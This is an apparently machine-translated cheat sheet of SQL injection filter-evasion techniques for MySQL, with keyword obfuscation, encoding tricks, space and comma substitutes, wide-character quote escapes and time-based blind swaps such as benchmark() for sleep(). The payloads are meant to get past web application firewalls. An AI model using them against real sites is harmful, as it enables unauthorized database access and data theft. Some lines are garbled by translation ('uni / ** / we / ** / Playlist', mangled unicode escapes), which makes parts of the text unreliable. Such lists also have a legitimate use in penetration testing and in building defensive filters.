Reference link: https: //blog.csdn.net/huanghelouzi/article/details/82995313
https://www.cnblogs.com/vincy99/p/9642882.html
table of Contents:
- Bypassing the case
- Write double bypass
- Inline comments bypass
- Encoding bypass
- <> Bypass
- Bypassing the Notes
- To bypass spaces
- To bypass or / and the
- To bypass the equal sign =
- Bypassing single quotes
- To bypass the comma
- Bypassing the filter function
0x01-sensitive bypass
UniOn SeleCt
Write 0x02 double bypass
ununionion seselectlect
0x03 inline comments bypass
Inline comments that only some specific statements on MYSQL placed /*!...*/
, so if these statements are not executed in other databases, but will be executed in MYSQL.
and /*!select*/ 1,2
0x04 bypass coding
Hex bypass:
select * from users where username = test1;
select * from users where username = 0x7465737431;
Keyword twice url entire coding:
1+and+1=2 1+%25%36%31%25%36%65%25%36%34+1=2
unicode encoding bypassing part of the symbols:
Single quotes =>% u0037% u02b9 Space =>% u0020% uff00 Left parenthesis =>% u0028% uff08 Right parenthesis =>% u0029% uff09
0x05 <> bypass
Some sites filtered "<>" symbol for the job:
unio<>n sel<>ect
0x06 comment symbol bypass
uni / ** / we / ** / Playlist
0x07 bypassing of spaces
/**/
%20 %09
()
Enter (url encoding % 0A)
`(Tap key button above)
tap
Two spaces
0x08 bypass on or / and the
and = &&
or = ||
0x09 to bypass the equal sign =
Without 通配符
the like
effect and implementation of =
the same, it can be used to bypass;
rlike
Usage and above like
, there is no effect and wildcards =
, like;
regexp: MySQL REGEXP operator used to perform regular expression matching
<> Is equivalent to! =, Plus one in the front so !
the result is an equal sign
?id=1 or 1 like 1 ?id=1 or 1 rlike 1 ?id=1 or 1 regexp 1 ?id=1 or !(1 <> 1)或者1 !(<>) 1
Single quotes to bypass 0x10
Wide character
# Filtering single quotes % bf% 27% df% 27 % aa% 27
Hexadecimal
'user'=>0x7573657273
0x11 commas bypass
Use blind from n1 for n2, where n1 n2 starts reading the representative length n1 from a substring
select substr("string",1,3); 等价于 select substr("string" from 1 for 3);
Use join
keywords to bypass
union select 1,2,3 等价于 union select * from (select 1)a join (select 2)b join(select 3)c
Use offset Keyword:
Applies to limit the filtered comma
limit 2,1 equivalent to the limit 1 offset 2
0x12 bypass the filter function
sleep() -->benchmark()
and sleep(1) Benchmark equivalent and ( 1000000000,1)
group_concat()–>concat_ws()
select group_concat("str1","str2");
等价于 select concat_ws(",","str1","str2");